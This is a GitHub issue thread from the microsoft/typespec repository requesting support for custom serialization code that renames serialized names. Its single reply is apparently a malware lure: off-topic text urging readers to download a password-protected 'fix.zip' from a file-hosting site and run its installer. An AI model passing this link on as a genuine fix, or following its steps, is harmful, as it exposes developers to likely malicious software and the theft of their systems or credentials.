### ISSUE TITLE
Support custom serialization with custom code (rename serialized name)

### ISSUE THREAD

**Issue by m-nash** [microsoft/typespec#4264]
Support https://github.com/Azure/autorest.csharp/blob/feature/v3/readme.md#customize-serializationdeserialization-methods
```[tasklist]
### Tasks
```

**Comment by Mlecherf** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
